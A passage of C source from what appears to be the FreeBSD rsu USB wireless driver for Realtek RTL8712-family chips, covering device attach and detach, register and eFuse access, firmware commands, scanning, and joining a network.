rsu_alloc_rx_list(struct rsu_softc *); static void rsu_free_rx_list(struct rsu_softc *); static int rsu_alloc_tx_list(struct rsu_softc *); static void rsu_free_tx_list(struct rsu_softc *); static void rsu_free_list(struct rsu_softc *, struct rsu_data [], int); static struct rsu_data *_rsu_getbuf(struct rsu_softc *); static struct rsu_data *rsu_getbuf(struct rsu_softc *); static int rsu_write_region_1(struct rsu_softc *, uint16_t, uint8_t *, int); static void rsu_write_1(struct rsu_softc *, uint16_t, uint8_t); static void rsu_write_2(struct rsu_softc *, uint16_t, uint16_t); static void rsu_write_4(struct rsu_softc *, uint16_t, uint32_t); static int rsu_read_region_1(struct rsu_softc *, uint16_t, uint8_t *, int); static uint8_t rsu_read_1(struct rsu_softc *, uint16_t); static uint16_t rsu_read_2(struct rsu_softc *, uint16_t); static uint32_t rsu_read_4(struct rsu_softc *, uint16_t); static int rsu_fw_iocmd(struct rsu_softc *, uint32_t); static uint8_t rsu_efuse_read_1(struct rsu_softc *, uint16_t); static int rsu_read_rom(struct rsu_softc *); static int rsu_fw_cmd(struct rsu_softc *, uint8_t, void *, int); static void rsu_calib_task(void *, int); static int rsu_newstate(struct ieee80211vap *, enum ieee80211_state, int); #ifdef notyet static void rsu_set_key(struct rsu_softc *, const struct ieee80211_key *); static void rsu_delete_key(struct rsu_softc *, const struct ieee80211_key *); #endif static int rsu_site_survey(struct rsu_softc *, struct ieee80211vap *); static int rsu_join_bss(struct rsu_softc *, struct ieee80211_node *); static int rsu_disconnect(struct rsu_softc *); static void rsu_event_survey(struct rsu_softc *, uint8_t *, int); static void rsu_event_join_bss(struct rsu_softc *, uint8_t *, int); static void rsu_rx_event(struct rsu_softc *, uint8_t, uint8_t *, int); static void rsu_rx_multi_event(struct rsu_softc *, uint8_t *, int); static int8_t rsu_get_rssi(struct rsu_softc *, int, void *); static struct mbuf * rsu_rx_frame(struct rsu_softc *, uint8_t *, int, int *); static struct mbuf * rsu_rx_multi_frame(struct rsu_softc *, uint8_t *, int, int *); static struct mbuf * rsu_rxeof(struct usb_xfer *, struct rsu_data *, int *); static void rsu_txeof(struct usb_xfer *, struct rsu_data *); static int rsu_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void rsu_init(void *); static void rsu_init_locked(struct rsu_softc *); static void rsu_watchdog(void *); static int rsu_tx_start(struct rsu_softc *, struct ieee80211_node *, struct mbuf *, struct rsu_data *); static void rsu_start(struct ifnet *); static 
void rsu_start_locked(struct ifnet *); static int rsu_ioctl(struct ifnet *, u_long, caddr_t); static void rsu_stop(struct ifnet *, int); static void rsu_stop_locked(struct ifnet *, int); static device_method_t rsu_methods[] = { DEVMETHOD(device_probe, rsu_match), DEVMETHOD(device_attach, rsu_attach), DEVMETHOD(device_detach, rsu_detach), DEVMETHOD_END }; static driver_t rsu_driver = { .name = "rsu", .methods = rsu_methods, .size = sizeof(struct rsu_softc) }; static devclass_t rsu_devclass; DRIVER_MODULE(rsu, uhub, rsu_driver, rsu_devclass, NULL, 0); MODULE_DEPEND(rsu, wlan, 1, 1, 1); MODULE_DEPEND(rsu, usb, 1, 1, 1); MODULE_DEPEND(rsu, firmware, 1, 1, 1); MODULE_VERSION(rsu, 1); static const struct usb_config rsu_config[RSU_N_TRANSFER] = { [RSU_BULK_RX] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_IN, .bufsize = RSU_RXBUFSZ, .flags = { .pipe_bof = 1, .short_xfer_ok = 1 }, .callback = rsu_bulk_rx_callback }, [RSU_BULK_TX_BE] = { .type = UE_BULK, .endpoint = 0x06, .direction = UE_DIR_OUT, .bufsize = RSU_TXBUFSZ, .flags = { .ext_buffer = 1, .pipe_bof = 1, .force_short_xfer = 1 }, .callback = rsu_bulk_tx_callback, .timeout = RSU_TX_TIMEOUT }, [RSU_BULK_TX_BK] = { .type = UE_BULK, .endpoint = 0x06, .direction = UE_DIR_OUT, .bufsize = RSU_TXBUFSZ, .flags = { .ext_buffer = 1, .pipe_bof = 1, .force_short_xfer = 1 }, .callback = rsu_bulk_tx_callback, .timeout = RSU_TX_TIMEOUT }, [RSU_BULK_TX_VI] = { .type = UE_BULK, .endpoint = 0x04, .direction = UE_DIR_OUT, .bufsize = RSU_TXBUFSZ, .flags = { .ext_buffer = 1, .pipe_bof = 1, .force_short_xfer = 1 }, .callback = rsu_bulk_tx_callback, .timeout = RSU_TX_TIMEOUT }, [RSU_BULK_TX_VO] = { .type = UE_BULK, .endpoint = 0x04, .direction = UE_DIR_OUT, .bufsize = RSU_TXBUFSZ, .flags = { .ext_buffer = 1, .pipe_bof = 1, .force_short_xfer = 1 }, .callback = rsu_bulk_tx_callback, .timeout = RSU_TX_TIMEOUT }, }; static int rsu_match(device_t self) { struct usb_attach_arg *uaa = device_get_ivars(self); if (uaa->usb_mode != USB_MODE_HOST || uaa->info.bIfaceIndex != 0 || uaa->info.bConfigIndex != 0) return (ENXIO); return (usbd_lookup_id_by_uaa(rsu_devs, sizeof(rsu_devs), uaa)); } static int rsu_attach(device_t self) { struct usb_attach_arg *uaa = device_get_ivars(self); struct rsu_softc *sc = device_get_softc(self); struct ifnet *ifp; struct ieee80211com *ic; int error; uint8_t iface_index, bands; device_set_usb_desc(self); sc->sc_udev = uaa->device; sc->sc_dev = self; mtx_init(&sc->sc_mtx, device_get_nameunit(self), MTX_NETWORK_LOCK, MTX_DEF); TIMEOUT_TASK_INIT(taskqueue_thread, &sc->calib_task, 0, rsu_calib_task, sc); callout_init(&sc->sc_watchdog_ch, 0); iface_index = 0; error = usbd_transfer_setup(uaa->device, &iface_index, sc->sc_xfer, rsu_config, RSU_N_TRANSFER, sc, &sc->sc_mtx); if (error) { device_printf(sc->sc_dev, "could not allocate USB transfers, err=%s\n", usbd_errstr(error)); goto fail_usb; } RSU_LOCK(sc); /* Read chip revision. 
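	 * The cut number comes from the PMC_FSM register and later selects
	 * between the A-cut and B/C-cut power-on sequences in
	 * rsu_init_locked().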
*/ sc->cut = MS(rsu_read_4(sc, R92S_PMC_FSM), R92S_PMC_FSM_CUT); if (sc->cut != 3) sc->cut = (sc->cut >> 1) + 1; error = rsu_read_rom(sc); if (error != 0) { device_printf(self, "could not read ROM\n"); goto fail_rom; } RSU_UNLOCK(sc); IEEE80211_ADDR_COPY(sc->sc_bssid, &sc->rom[0x12]); device_printf(self, "MAC/BB RTL8712 cut %d\n", sc->cut); ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(self, "cannot allocate interface\n"); goto fail_ifalloc; } ic = ifp->if_l2com; ifp->if_softc = sc; if_initname(ifp, "rsu", device_get_unit(self)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = rsu_init; ifp->if_ioctl = rsu_ioctl; ifp->if_start = rsu_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ifp->if_capabilities |= IFCAP_RXCSUM; ifp->if_capenable |= IFCAP_RXCSUM; ifp->if_hwassist = CSUM_TCP; ic->ic_ifp = ifp; ic->ic_phytype = IEEE80211_T_OFDM; /* Not only, but not used. */ ic->ic_opmode = IEEE80211_M_STA; /* Default to BSS mode. */ /* Set device capabilities. */ ic->ic_caps = IEEE80211_C_STA | /* station mode */ IEEE80211_C_BGSCAN | /* Background scan. */ IEEE80211_C_SHPREAMBLE | /* Short preamble supported. */ IEEE80211_C_SHSLOT | /* Short slot time supported. */ IEEE80211_C_WPA; /* WPA/RSN. */ #if 0 /* Check if HT support is present. */ if (usb_lookup(rsu_devs_noht, uaa->vendor, uaa->product) == NULL) { /* Set HT capabilities. */ ic->ic_htcaps = IEEE80211_HTCAP_CBW20_40 | IEEE80211_HTCAP_DSSSCCK40; /* Set supported HT rates. */ for (i = 0; i < 2; i++) ic->ic_sup_mcs[i] = 0xff; } #endif /* Set supported .11b and .11g rates. */ bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, sc->sc_bssid); ic->ic_raw_xmit = rsu_raw_xmit; ic->ic_scan_start = rsu_scan_start; ic->ic_scan_end = rsu_scan_end; ic->ic_set_channel = rsu_set_channel; ic->ic_vap_create = rsu_vap_create; ic->ic_vap_delete = rsu_vap_delete; ic->ic_update_mcast = rsu_update_mcast; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), RSU_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), RSU_RX_RADIOTAP_PRESENT); if (bootverbose) ieee80211_announce(ic); return (0); fail_ifalloc: fail_rom: usbd_transfer_unsetup(sc->sc_xfer, RSU_N_TRANSFER); fail_usb: mtx_destroy(&sc->sc_mtx); return (ENXIO); } static int rsu_detach(device_t self) { struct rsu_softc *sc = device_get_softc(self); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; if (!device_is_attached(self)) return (0); rsu_stop(ifp, 1); usbd_transfer_unsetup(sc->sc_xfer, RSU_N_TRANSFER); ieee80211_ifdetach(ic); callout_drain(&sc->sc_watchdog_ch); taskqueue_drain_timeout(taskqueue_thread, &sc->calib_task); /* Free Tx/Rx buffers. 
*/ rsu_free_tx_list(sc); rsu_free_rx_list(sc); if_free(ifp); mtx_destroy(&sc->sc_mtx); return (0); } static usb_error_t rsu_do_request(struct rsu_softc *sc, struct usb_device_request *req, void *data) { usb_error_t err; int ntries = 10; RSU_ASSERT_LOCKED(sc); while (ntries--) { err = usbd_do_request_flags(sc->sc_udev, &sc->sc_mtx, req, data, 0, NULL, 250 /* ms */); if (err == 0 || !device_is_attached(sc->sc_dev)) break; DPRINTFN(1, "Control request failed, %s (retrying)\n", usbd_errstr(err)); usb_pause_mtx(&sc->sc_mtx, hz / 100); } return (err); } static struct ieee80211vap * rsu_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct rsu_vap *uvp; struct ieee80211vap *vap; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return (NULL); uvp = (struct rsu_vap *) malloc(sizeof(struct rsu_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (uvp == NULL) return (NULL); vap = &uvp->vap; if (ieee80211_vap_setup(ic, vap, name, unit, opmode, flags, bssid, mac) != 0) { /* out of memory */ free(uvp, M_80211_VAP); return (NULL); } /* override state transition machine */ uvp->newstate = vap->iv_newstate; vap->iv_newstate = rsu_newstate; /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); ic->ic_opmode = opmode; return (vap); } static void rsu_vap_delete(struct ieee80211vap *vap) { struct rsu_vap *uvp = RSU_VAP(vap); ieee80211_vap_detach(vap); free(uvp, M_80211_VAP); } static void rsu_scan_start(struct ieee80211com *ic) { int error; struct ifnet *ifp = ic->ic_ifp; struct rsu_softc *sc = ifp->if_softc; /* Scanning is done by the firmware. */ RSU_LOCK(sc); error = rsu_site_survey(sc, TAILQ_FIRST(&ic->ic_vaps)); RSU_UNLOCK(sc); if (error != 0) device_printf(sc->sc_dev, "could not send site survey command\n"); } static void rsu_scan_end(struct ieee80211com *ic) { /* Nothing to do here. */ } static void rsu_set_channel(struct ieee80211com *ic __unused) { /* We are unable to switch channels, yet. */ } static void rsu_update_mcast(struct ifnet *ifp) { /* XXX do nothing? 
*/ } static int rsu_alloc_list(struct rsu_softc *sc, struct rsu_data data[], int ndata, int maxsz) { int i, error; for (i = 0; i < ndata; i++) { struct rsu_data *dp = &data[i]; dp->sc = sc; dp->m = NULL; dp->buf = malloc(maxsz, M_USBDEV, M_NOWAIT); if (dp->buf == NULL) { device_printf(sc->sc_dev, "could not allocate buffer\n"); error = ENOMEM; goto fail; } dp->ni = NULL; } return (0); fail: rsu_free_list(sc, data, ndata); return (error); } static int rsu_alloc_rx_list(struct rsu_softc *sc) { int error, i; error = rsu_alloc_list(sc, sc->sc_rx, RSU_RX_LIST_COUNT, RSU_RXBUFSZ); if (error != 0) return (error); STAILQ_INIT(&sc->sc_rx_active); STAILQ_INIT(&sc->sc_rx_inactive); for (i = 0; i < RSU_RX_LIST_COUNT; i++) STAILQ_INSERT_HEAD(&sc->sc_rx_inactive, &sc->sc_rx[i], next); return (0); } static int rsu_alloc_tx_list(struct rsu_softc *sc) { int error, i; error = rsu_alloc_list(sc, sc->sc_tx, RSU_TX_LIST_COUNT, RSU_TXBUFSZ); if (error != 0) return (error); STAILQ_INIT(&sc->sc_tx_active); STAILQ_INIT(&sc->sc_tx_inactive); STAILQ_INIT(&sc->sc_tx_pending); for (i = 0; i < RSU_TX_LIST_COUNT; i++) { STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, &sc->sc_tx[i], next); } return (0); } static void rsu_free_tx_list(struct rsu_softc *sc) { rsu_free_list(sc, sc->sc_tx, RSU_TX_LIST_COUNT); } static void rsu_free_rx_list(struct rsu_softc *sc) { rsu_free_list(sc, sc->sc_rx, RSU_RX_LIST_COUNT); } static void rsu_free_list(struct rsu_softc *sc, struct rsu_data data[], int ndata) { int i; for (i = 0; i < ndata; i++) { struct rsu_data *dp = &data[i]; if (dp->buf != NULL) { free(dp->buf, M_USBDEV); dp->buf = NULL; } if (dp->ni != NULL) { ieee80211_free_node(dp->ni); dp->ni = NULL; } } } static struct rsu_data * _rsu_getbuf(struct rsu_softc *sc) { struct rsu_data *bf; bf = STAILQ_FIRST(&sc->sc_tx_inactive); if (bf != NULL) STAILQ_REMOVE_HEAD(&sc->sc_tx_inactive, next); else bf = NULL; if (bf == NULL) DPRINTF("out of xmit buffers\n"); return (bf); } static struct rsu_data * rsu_getbuf(struct rsu_softc *sc) { struct rsu_data *bf; RSU_ASSERT_LOCKED(sc); bf = _rsu_getbuf(sc); if (bf == NULL) { struct ifnet *ifp = sc->sc_ifp; DPRINTF("stop queue\n"); ifp->if_drv_flags |= IFF_DRV_OACTIVE; } return (bf); } static int rsu_write_region_1(struct rsu_softc *sc, uint16_t addr, uint8_t *buf, int len) { usb_device_request_t req; req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = R92S_REQ_REGS; USETW(req.wValue, addr); USETW(req.wIndex, 0); USETW(req.wLength, len); return (rsu_do_request(sc, &req, buf)); } static void rsu_write_1(struct rsu_softc *sc, uint16_t addr, uint8_t val) { rsu_write_region_1(sc, addr, &val, 1); } static void rsu_write_2(struct rsu_softc *sc, uint16_t addr, uint16_t val) { val = htole16(val); rsu_write_region_1(sc, addr, (uint8_t *)&val, 2); } static void rsu_write_4(struct rsu_softc *sc, uint16_t addr, uint32_t val) { val = htole32(val); rsu_write_region_1(sc, addr, (uint8_t *)&val, 4); } static int rsu_read_region_1(struct rsu_softc *sc, uint16_t addr, uint8_t *buf, int len) { usb_device_request_t req; req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = R92S_REQ_REGS; USETW(req.wValue, addr); USETW(req.wIndex, 0); USETW(req.wLength, len); return (rsu_do_request(sc, &req, buf)); } static uint8_t rsu_read_1(struct rsu_softc *sc, uint16_t addr) { uint8_t val; if (rsu_read_region_1(sc, addr, &val, 1) != 0) return (0xff); return (val); } static uint16_t rsu_read_2(struct rsu_softc *sc, uint16_t addr) { uint16_t val; if (rsu_read_region_1(sc, addr, (uint8_t *)&val, 2) != 0) return (0xffff); return 
(le16toh(val)); } static uint32_t rsu_read_4(struct rsu_softc *sc, uint16_t addr) { uint32_t val; if (rsu_read_region_1(sc, addr, (uint8_t *)&val, 4) != 0) return (0xffffffff); return (le32toh(val)); } static int rsu_fw_iocmd(struct rsu_softc *sc, uint32_t iocmd) { int ntries; rsu_write_4(sc, R92S_IOCMD_CTRL, iocmd); DELAY(100); for (ntries = 0; ntries < 50; ntries++) { if (rsu_read_4(sc, R92S_IOCMD_CTRL) == 0) return (0); DELAY(10); } return (ETIMEDOUT); } static uint8_t rsu_efuse_read_1(struct rsu_softc *sc, uint16_t addr) { uint32_t reg; int ntries; reg = rsu_read_4(sc, R92S_EFUSE_CTRL); reg = RW(reg, R92S_EFUSE_CTRL_ADDR, addr); reg &= ~R92S_EFUSE_CTRL_VALID; rsu_write_4(sc, R92S_EFUSE_CTRL, reg); /* Wait for read operation to complete. */ for (ntries = 0; ntries < 100; ntries++) { reg = rsu_read_4(sc, R92S_EFUSE_CTRL); if (reg & R92S_EFUSE_CTRL_VALID) return (MS(reg, R92S_EFUSE_CTRL_DATA)); DELAY(5); } device_printf(sc->sc_dev, "could not read efuse byte at address 0x%x\n", addr); return (0xff); } static int rsu_read_rom(struct rsu_softc *sc) { uint8_t *rom = sc->rom; uint16_t addr = 0; uint32_t reg; uint8_t off, msk; int i; /* Make sure that ROM type is eFuse and that autoload succeeded. */ reg = rsu_read_1(sc, R92S_EE_9346CR); if ((reg & (R92S_9356SEL | R92S_EEPROM_EN)) != R92S_EEPROM_EN) return (EIO); /* Turn on 2.5V to prevent eFuse leakage. */ reg = rsu_read_1(sc, R92S_EFUSE_TEST + 3); rsu_write_1(sc, R92S_EFUSE_TEST + 3, reg | 0x80); DELAY(1000); rsu_write_1(sc, R92S_EFUSE_TEST + 3, reg & ~0x80); /* Read full ROM image. */ memset(&sc->rom, 0xff, sizeof(sc->rom)); while (addr < 512) { reg = rsu_efuse_read_1(sc, addr); if (reg == 0xff) break; addr++; off = reg >> 4; msk = reg & 0xf; for (i = 0; i < 4; i++) { if (msk & (1 << i)) continue; rom[off * 8 + i * 2 + 0] = rsu_efuse_read_1(sc, addr); addr++; rom[off * 8 + i * 2 + 1] = rsu_efuse_read_1(sc, addr); addr++; } } #ifdef USB_DEBUG if (rsu_debug >= 5) { /* Dump ROM content. */ printf("\n"); for (i = 0; i < sizeof(sc->rom); i++) printf("%02x:", rom[i]); printf("\n"); } #endif return (0); } static int rsu_fw_cmd(struct rsu_softc *sc, uint8_t code, void *buf, int len) { struct rsu_data *data; struct r92s_tx_desc *txd; struct r92s_fw_cmd_hdr *cmd; int cmdsz, xferlen; data = rsu_getbuf(sc); if (data == NULL) return (ENOMEM); /* Round-up command length to a multiple of 8 bytes. */ cmdsz = (len + 7) & ~7; xferlen = sizeof(*txd) + sizeof(*cmd) + cmdsz; KASSERT(xferlen <= RSU_TXBUFSZ, ("%s: invalid length", __func__)); memset(data->buf, 0, xferlen); /* Setup Tx descriptor. */ txd = (struct r92s_tx_desc *)data->buf; txd->txdw0 = htole32( SM(R92S_TXDW0_OFFSET, sizeof(*txd)) | SM(R92S_TXDW0_PKTLEN, sizeof(*cmd) + cmdsz) | R92S_TXDW0_OWN | R92S_TXDW0_FSG | R92S_TXDW0_LSG); txd->txdw1 = htole32(SM(R92S_TXDW1_QSEL, R92S_TXDW1_QSEL_H2C)); /* Setup command header. */ cmd = (struct r92s_fw_cmd_hdr *)&txd[1]; cmd->len = htole16(cmdsz); cmd->code = code; cmd->seq = sc->cmd_seq; sc->cmd_seq = (sc->cmd_seq + 1) & 0x7f; /* Copy command payload. */ memcpy(&cmd[1], buf, len); DPRINTFN(2, "Tx cmd code=0x%x len=0x%x\n", code, cmdsz); data->buflen = xferlen; STAILQ_INSERT_TAIL(&sc->sc_tx_pending, data, next); usbd_transfer_start(sc->sc_xfer[RSU_BULK_TX_VO]); return (0); } /* ARGSUSED */ static void rsu_calib_task(void *arg, int pending __unused) { struct rsu_softc *sc = arg; uint32_t reg; DPRINTFN(6, "running calibration task\n"); RSU_LOCK(sc); #ifdef notyet /* Read WPS PBC status. 
*/ rsu_write_1(sc, R92S_MAC_PINMUX_CTRL, R92S_GPIOMUX_EN | SM(R92S_GPIOSEL_GPIO, R92S_GPIOSEL_GPIO_JTAG)); rsu_write_1(sc, R92S_GPIO_IO_SEL, rsu_read_1(sc, R92S_GPIO_IO_SEL) & ~R92S_GPIO_WPS); reg = rsu_read_1(sc, R92S_GPIO_CTRL); if (reg != 0xff && (reg & R92S_GPIO_WPS)) DPRINTF(("WPS PBC is pushed\n")); #endif /* Read current signal level. */ if (rsu_fw_iocmd(sc, 0xf4000001) == 0) { reg = rsu_read_4(sc, R92S_IOCMD_DATA); DPRINTFN(8, "RSSI=%d%%\n", reg >> 4); } if (sc->sc_calibrating) { RSU_UNLOCK(sc); taskqueue_enqueue_timeout(taskqueue_thread, &sc->calib_task, hz * 2); } else RSU_UNLOCK(sc); } static int rsu_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct rsu_vap *uvp = RSU_VAP(vap); struct ieee80211com *ic = vap->iv_ic; struct rsu_softc *sc = ic->ic_ifp->if_softc; struct ieee80211_node *ni; struct ieee80211_rateset *rs; enum ieee80211_state ostate; int error, startcal = 0; ostate = vap->iv_state; DPRINTF("%s -> %s\n", ieee80211_state_name[ostate], ieee80211_state_name[nstate]); IEEE80211_UNLOCK(ic); if (ostate == IEEE80211_S_RUN) { RSU_LOCK(sc); /* Stop calibration. */ sc->sc_calibrating = 0; RSU_UNLOCK(sc); taskqueue_drain_timeout(taskqueue_thread, &sc->calib_task); /* Disassociate from our current BSS. */ RSU_LOCK(sc); rsu_disconnect(sc); } else RSU_LOCK(sc); switch (nstate) { case IEEE80211_S_INIT: break; case IEEE80211_S_AUTH: ni = ieee80211_ref_node(vap->iv_bss); error = rsu_join_bss(sc, ni); ieee80211_free_node(ni); if (error != 0) { device_printf(sc->sc_dev, "could not send join command\n"); } break; case IEEE80211_S_RUN: ni = ieee80211_ref_node(vap->iv_bss); rs = &ni->ni_rates; /* Indicate highest supported rate. */ ni->ni_txrate = rs->rs_rates[rs->rs_nrates - 1]; ieee80211_free_node(ni); startcal = 1; break; default: break; } sc->sc_calibrating = 1; RSU_UNLOCK(sc); IEEE80211_LOCK(ic); /* Start periodic calibration. */ taskqueue_enqueue_timeout(taskqueue_thread, &sc->calib_task, hz * 2); return (uvp->newstate(vap, nstate, arg)); } #ifdef notyet static void rsu_set_key(struct rsu_softc *sc, const struct ieee80211_key *k) { struct r92s_fw_cmd_set_key key; memset(&key, 0, sizeof(key)); /* Map net80211 cipher to HW crypto algorithm. */ switch (k->wk_cipher->ic_cipher) { case IEEE80211_CIPHER_WEP: if (k->wk_keylen < 8) key.algo = R92S_KEY_ALGO_WEP40; else key.algo = R92S_KEY_ALGO_WEP104; break; case IEEE80211_CIPHER_TKIP: key.algo = R92S_KEY_ALGO_TKIP; break; case IEEE80211_CIPHER_AES_CCM: key.algo = R92S_KEY_ALGO_AES; break; default: return; } key.id = k->wk_keyix; key.grpkey = (k->wk_flags & IEEE80211_KEY_GROUP) != 0; memcpy(key.key, k->wk_key, MIN(k->wk_keylen, sizeof(key.key))); (void)rsu_fw_cmd(sc, R92S_CMD_SET_KEY, &key, sizeof(key)); } static void rsu_delete_key(struct rsu_softc *sc, const struct ieee80211_key *k) { struct r92s_fw_cmd_set_key key; memset(&key, 0, sizeof(key)); key.id = k->wk_keyix; (void)rsu_fw_cmd(sc, R92S_CMD_SET_KEY, &key, sizeof(key)); } #endif static int rsu_site_survey(struct rsu_softc *sc, struct ieee80211vap *vap) { struct r92s_fw_cmd_sitesurvey cmd; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; memset(&cmd, 0, sizeof(cmd)); if ((ic->ic_flags & IEEE80211_F_ASCAN) || sc->scan_pass == 1) cmd.active = htole32(1); cmd.limit = htole32(48); if (sc->scan_pass == 1 && vap->iv_des_nssid > 0) { /* Do a directed scan for second pass. 
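		 * The desired SSID is copied into the site-survey command so
		 * the firmware probes for it explicitly rather than relying
		 * on broadcast probe requests.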
*/ cmd.ssidlen = htole32(vap->iv_des_ssid[0].len); memcpy(cmd.ssid, vap->iv_des_ssid[0].ssid, vap->iv_des_ssid[0].len); } DPRINTF("sending site survey command, pass=%d\n", sc->scan_pass); return (rsu_fw_cmd(sc, R92S_CMD_SITE_SURVEY, &cmd, sizeof(cmd))); } static int rsu_join_bss(struct rsu_softc *sc, struct ieee80211_node *ni) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = ni->ni_vap; struct ndis_wlan_bssid_ex *bss; struct ndis_802_11_fixed_ies *fixed; struct r92s_fw_cmd_auth auth; uint8_t buf[sizeof(*bss) + 128], *frm; uint8_t opmode; int error; /* Let the FW decide the opmode based on the capinfo field. */ opmode = NDIS802_11AUTOUNKNOWN; DPRINTF("setting operating mode to %d\n", opmode); error = rsu_fw_cmd(sc, R92S_CMD_SET_OPMODE, &opmode, sizeof(opmode)); if (error != 0) return (error); memset(&auth, 0, sizeof(auth)); if (vap->iv_flags & IEEE80211_F_WPA) { auth.mode = R92S_AUTHMODE_WPA; auth.dot1x = ni->ni_authmode == IEEE80211_AUTH_8021X; } else auth.mode = R92S_AUTHMODE_OPEN; DPRINTF("setting auth mode to %d\n", auth.mode); error = rsu_fw_cmd(sc, R92S_CMD_SET_AUTH, &auth, sizeof(auth)); if (error != 0) return (error); memset(buf, 0, sizeof(buf)); bss = (struct ndis_wlan_bssid_ex *)buf; IEEE80211_ADDR_COPY(bss->macaddr, ni->ni_bssid); bss->ssid.ssidlen = htole32(ni->ni_esslen); memcpy(bss->ssid.ssid, ni->ni_essid, ni->ni_esslen); if (vap->iv_flags & (IEEE80211_F_PRIVACY | IEEE80211_F_WPA)) bss->privacy = htole32(1); bss->rssi = htole32(ni->ni_avgrssi); if (ic->ic_curmode == IEEE80211_MODE_11B) bss->networktype = htole32(NDIS802_11DS); else bss->networktype = htole32(NDIS802_11OFDM24); bss->config.len = htole32(sizeof(bss->config)); bss->config.bintval = htole32(ni->ni_intval); bss->config.dsconfig = htole32(ieee80211_chan2ieee(ic, ni->ni_chan)); bss->inframode = htole32(NDIS802_11INFRASTRUCTURE); memcpy(bss->supprates, ni->ni_rates.rs_rates, ni->ni_rates.rs_nrates); /* Write the fixed fields of the beacon frame. */ fixed = (struct ndis_802_11_fixed_ies *)&bss[1]; memcpy(&fixed->tstamp, ni->ni_tstamp.data, 8); fixed->bintval = htole16(ni->ni_intval); fixed->capabilities = htole16(ni->ni_capinfo); /* Write IEs to be included in the association request. */ frm = (uint8_t *)&fixed[1]; frm = ieee80211_add_rsn(frm, vap); frm = ieee80211_add_wpa(frm, vap); frm = ieee80211_add_qos(frm, ni); if (ni->ni_flags & IEEE80211_NODE_HT) frm = ieee80211_add_htcap(frm, ni); bss->ieslen = htole32(frm - (uint8_t *)fixed); bss->len = htole32(((frm - buf) + 3) & ~3); DPRINTF("sending join bss command to %s chan %d\n", ether_sprintf(bss->macaddr), le32toh(bss->config.dsconfig)); return (rsu_fw_cmd(sc, R92S_CMD_JOIN_BSS, buf, sizeof(buf))); } static int rsu_disconnect(struct rsu_softc *sc) { uint32_t zero = 0; /* :-) */ /* Disassociate from our current BSS. 
*/ DPRINTF("sending disconnect command\n"); return (rsu_fw_cmd(sc, R92S_CMD_DISCONNECT, &zero, sizeof(zero))); } static void rsu_event_survey(struct rsu_softc *sc, uint8_t *buf, int len) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_frame *wh; struct ieee80211_channel *c; struct ndis_wlan_bssid_ex *bss; struct mbuf *m; int pktlen; if (__predict_false(len < sizeof(*bss))) return; bss = (struct ndis_wlan_bssid_ex *)buf; if (__predict_false(len < sizeof(*bss) + le32toh(bss->ieslen))) return; DPRINTFN(2, "found BSS %s: len=%d chan=%d inframode=%d " "networktype=%d privacy=%d\n", ether_sprintf(bss->macaddr), le32toh(bss->len), le32toh(bss->config.dsconfig), le32toh(bss->inframode), le32toh(bss->networktype), le32toh(bss->privacy)); /* Build a fake beacon frame to let net80211 do all the parsing. */ pktlen = sizeof(*wh) + le32toh(bss->ieslen); if (__predict_false(pktlen > MCLBYTES)) return; MGETHDR(m, M_DONTWAIT, MT_DATA); if (__predict_false(m == NULL)) return; if (pktlen > MHLEN) { MCLGET(m, M_DONTWAIT); if (!(m->m_flags & M_EXT)) { m_free(m); return; } } wh = mtod(m, struct ieee80211_frame *); wh->i_fc[0] = IEEE80211_FC0_VERSION_0 | IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_BEACON; wh->i_fc[1] = IEEE80211_FC1_DIR_NODS; USETW(wh->i_dur, 0); IEEE80211_ADDR_COPY(wh->i_addr1, ifp->if_broadcastaddr); IEEE80211_ADDR_COPY(wh->i_addr2, bss->macaddr); IEEE80211_ADDR_COPY(wh->i_addr3, bss->macaddr); *(uint16_t *)wh->i_seq = 0; memcpy(&wh[1], (uint8_t *)&bss[1], le32toh(bss->ieslen)); /* Finalize mbuf. */ m->m_pkthdr.len = m->m_len = pktlen; m->m_pkthdr.rcvif = ifp; /* Fix the channel. */ c = ieee80211_find_channel_byieee(ic, le32toh(bss->config.dsconfig), IEEE80211_CHAN_G); if (c) { ic->ic_curchan = c; ieee80211_radiotap_chan_change(ic); } /* XXX avoid a LOR */ RSU_UNLOCK(sc); ieee80211_input_all(ic, m, le32toh(bss->rssi), 0); RSU_LOCK(sc); } static void rsu_event_join_bss(struct rsu_softc *sc, uint8_t *buf, int len) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct ieee80211_node *ni = vap->iv_bss; struct r92s_event_join_bss *rsp; int res; if (__predict_false(len < sizeof(*rsp))) return; rsp = (struct r92s_event_join_bss *)buf; res = (int)le32toh(rsp->join_res); DPRINTF("Rx join 